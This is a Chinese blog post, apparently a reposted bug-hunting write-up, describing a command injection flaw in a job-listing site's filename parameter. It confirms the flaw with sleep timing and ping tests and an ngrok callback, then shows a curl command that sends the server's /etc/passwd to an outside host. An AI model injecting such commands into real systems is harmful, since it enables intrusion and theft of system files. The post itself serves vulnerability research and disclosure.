命令注入漏洞挖掘

admin 2024年3月31日19:50:37评论14 views字数 775阅读2分35秒阅读模式

在一个职位列表网站中发现了一个命令注入漏洞。这是简单的概念证明。易受攻击的参数是filename

我使用此命令“sleep 5”进行测试,响应延迟了 5-6 秒(6.113 毫秒)。请参阅下面右角的延迟。命令注入漏洞挖掘

我再次用“sleep 10”仔细检查以确保并看到差异。响应再次延迟 10-11 秒(11.137 毫秒)。请参阅下面右角的延迟。

命令注入漏洞挖掘

我尝试使用“ping -c 5 <我的服务器 IP 地址>”ping 我的服务器,并在我的服务器上运行tcpdump -i <interface> -n icmp以查看传入的 ICMP 数据包。该 ping 命令意味着向我的服务器 IP 地址发送 5 次 ICMP 数据包。

命令注入漏洞挖掘

命令注入漏洞挖掘

很抱歉进行了编辑,但您可以看到我收到了 5 次 ICMP 数据包。我的服务器 IP 地址是 5.000.000.105,传入的 ICMP 数据包来自 000.000.39.169。现在我知道文件名参数容易受到命令注入的攻击。

我正在使用 ngrok 进行另一个测试。因此,我在本地主机上运行./ngrok http 80,然后在易受攻击的参数上执行“curl blablabla.ngrok.io” 。

命令注入漏洞挖掘

现在查看 ngrok Web 界面 (http://127.0.0.1:4040) 上的响应。我收到来自 IP 地址 000.000.39.169 的传入请求。与上面 ICMP 请求中的 IP 地址相同。

命令注入漏洞挖掘

现在我可以读取易受攻击的服务器上的文件并使用此命令`curl -F shl=@/etc/passwd blablabla.ngrok.io`将其发送到我的 ngrok 地址。该命令意味着使用包含 /etc/passwd 的 shl 参数向 blablabla.ngrok.io 发送 POST 请求。

命令注入漏洞挖掘

结果是易受攻击的服务器将其 /etc/passwd 发送到我的 ngrok 地址。再次来自 IP 地址 000.000.39.169。

命令注入漏洞挖掘

命令注入漏洞挖掘

原文始发于微信公众号(PwnPigPig):命令注入漏洞挖掘

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月31日19:50:37
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   命令注入漏洞挖掘https://cn-sec.com/archives/2616025.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息